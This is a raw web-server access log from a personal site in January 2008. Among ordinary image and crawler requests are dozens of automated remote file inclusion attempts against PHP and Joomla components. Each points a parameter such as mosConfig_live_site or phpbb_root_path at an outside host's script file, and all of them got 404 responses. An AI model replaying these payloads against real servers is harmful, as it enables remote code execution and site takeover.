24.18.45.238 - - [26/Jan/2008:17:46:37 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:38 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:38 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:38 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:17:46:43 -0800] "GET /logs/access_071230.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:48:45 -0800] "GET /logs/access_071230.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:48:45 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:48:45 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.63.209.59 - - [26/Jan/2008:17:52:21 -0800] "GET /megumi/Bracelet?M=A HTTP/1.1" 301 104 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
75.63.209.59 - - [26/Jan/2008:17:52:21 -0800] "GET /megumi/Bracelet/?M=A HTTP/1.1" 200 1705 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
75.63.209.59 - - [26/Jan/2008:17:52:23 -0800] "GET /megumi/Bracelet/2_Carnelian_Orange_Bracelet_30.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:52:34 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:52:34 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:52:34 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Jan/2008:17:53:22 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.63.209.59 - - [26/Jan/2008:17:54:05 -0800] "GET /megumi/Bracelet/2_Carnelian_Orange_Bracelet_30.JPG HTTP/1.1" 206 196608 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
75.63.209.59 - - [26/Jan/2008:17:54:08 -0800] "GET /megumi/Bracelet/2_Carnelian_Orange_Bracelet_30.JPG HTTP/1.1" 206 1769472 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
74.6.22.126 - - [26/Jan/2008:17:56:56 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.44 - - [26/Jan/2008:17:57:10 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:57:22 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:57:28 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:57:29 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:17:59:22 -0800] "GET /logs/access_071230.log/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:17:59:22 -0800] "GET /index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:17:59:23 -0800] "GET /logs/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.91.99.14 - - [26/Jan/2008:17:59:23 -0800] "GET /logs/access_071230.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.12.116.144 - - [26/Jan/2008:17:59:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.12.116.138 - - [26/Jan/2008:17:59:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.12.116.143 - - [26/Jan/2008:17:59:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.12.116.144 - - [26/Jan/2008:17:59:39 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.12.116.195 - - [26/Jan/2008:17:59:41 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.12.116.140 - - [26/Jan/2008:17:59:41 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.12.116.142 - - [26/Jan/2008:17:59:41 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:41 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:41 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
64.12.116.144 - - [26/Jan/2008:17:59:42 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:42 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:42 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:43 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:46 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:46 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.237.137.105 - - [26/Jan/2008:17:59:47 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:04:21 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:04:21 -0800] "GET //login.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:04:22 -0800] "GET /logs//login.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:18:04:50 -0800] "GET /logs/access_071230.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:05:30 -0800] "GET /logs/access_071225.log/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.114 - - [26/Jan/2008:18:05:58 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 225555 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:18:06:57 -0800] "GET /logs/access_080106.log//war.php?vwar_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:18:06:57 -0800] "GET //war.php?vwar_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:18:06:57 -0800] "GET /logs//war.php?vwar_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:07:15 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.217.62.202 - - [26/Jan/2008:18:08:01 -0800] "GET //vwar/upload/errors.php?error=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
62.217.62.202 - - [26/Jan/2008:18:08:01 -0800] "GET /logs//vwar/upload/errors.php?error=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:08:14 -0800] "GET /logs/access_071230.log/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:08:16 -0800] "GET /index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:08:17 -0800] "GET /logs/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:08:30 -0800] "GET /logs/access_071224.log/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:11:35 -0800] "GET /logs/access_071225.log/index.php?pageurl=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:18:12:09 -0800] "GET /logs/access_071230.log//joinus.php?vwar_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:18:12:09 -0800] "GET //joinus.php?vwar_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:18:12:09 -0800] "GET /logs//joinus.php?vwar_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [26/Jan/2008:18:17:09 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [26/Jan/2008:18:17:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.215 - - [26/Jan/2008:18:17:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.141.247 - - [26/Jan/2008:18:17:15 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.247 - - [26/Jan/2008:18:17:15 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.247 - - [26/Jan/2008:18:17:15 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.109 - - [26/Jan/2008:18:20:15 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:21:05 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:21:05 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:21:06 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.87.65 - - [26/Jan/2008:18:21:06 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.223.125.188 - - [26/Jan/2008:18:21:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.223.125.188 - - [26/Jan/2008:18:21:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.107 - - [26/Jan/2008:18:22:53 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:27:59 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:28:01 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:28:03 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.20.55.20 - - [26/Jan/2008:18:30:53 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.94 - - [26/Jan/2008:18:31:21 -0800] "GET /logs/access.log HTTP/1.0" 200 492418 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:18:32:32 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.87.65 - - [26/Jan/2008:18:34:32 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.87.65 - - [26/Jan/2008:18:34:32 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:18:35:02 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.244.196.210 - - [26/Jan/2008:18:35:36 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.244.196.210 - - [26/Jan/2008:18:35:36 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.244.196.210 - - [26/Jan/2008:18:35:37 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.87.145 - - [26/Jan/2008:18:36:59 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.29.87.145 - - [26/Jan/2008:18:37:00 -0800] "GET //components/com_minibb.php?absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.87.145 - - [26/Jan/2008:18:37:00 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.87.145 - - [26/Jan/2008:18:37:01 -0800] "GET //components/com_minibb.php?absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.6.22.126 - - [26/Jan/2008:18:39:07 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.34.32.66 - - [26/Jan/2008:18:39:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [26/Jan/2008:18:39:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:18:39:19 -0800] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:18:39:19 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:18:39:19 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.114.18.131 - - [26/Jan/2008:18:39:31 -0800] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.244.196.210 - - [26/Jan/2008:18:40:00 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:18:40:35 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.223.125.188 - - [26/Jan/2008:18:41:32 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.79 - - [26/Jan/2008:18:43:40 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:18:44:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:18:44:02 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
